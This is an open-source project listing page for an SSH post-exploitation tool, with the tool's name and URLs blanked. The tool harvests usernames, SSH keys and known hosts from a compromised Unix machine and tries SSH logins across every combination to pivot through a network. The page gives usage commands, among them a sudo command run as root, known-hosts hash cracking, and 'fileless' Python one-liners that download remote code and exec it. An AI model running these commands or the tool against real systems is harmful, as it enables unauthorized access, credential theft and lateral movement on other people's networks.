Awesome Open Source
Awesome Open Source

unix SSH post-exploitation 1337 tool

how it works is a post-exploitation tool meant to help network pivoting from a compromised unix box. It collect usernames, ssh keys and known hosts from a unix system, then it tries to connect via ssh to all the combinations found. is wrote in order to work on both standard python2 and python3 interpreters.


screenshot from 2018-12-11 14-01-15


standard execution:

 ~$ ./

skip passwd checks and use a custom home path:

 ~$ ./ --no-passwd --home /home/ldapusers/

execute commands with sudo:

 ~$ ./ --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"

cracking ssh hashed known hosts:

 ~$ ./ --crack

python2 one-liner fileless ( with --no-passwd parameter ):

 ~$ python -c "import urllib2;exec(urllib2.urlopen('').read())" --no-passwd

python3 one-liner fileless:

 ~$ python3 -c "import requests;exec(requests.get('').text)"


  • improve private keys hunting including dsa keys
  • Recursion
  • SSH keys with password bruteforce

Get A Weekly Email With Trending Projects For These Topics
No Spam. Unsubscribe easily at any time.
Python (1,137,692
Ssh (2,226
Unix (1,603
Penetration Testing (803
Pentest Tool (431
Offensive Security (169
Post Exploitation (136
Related Projects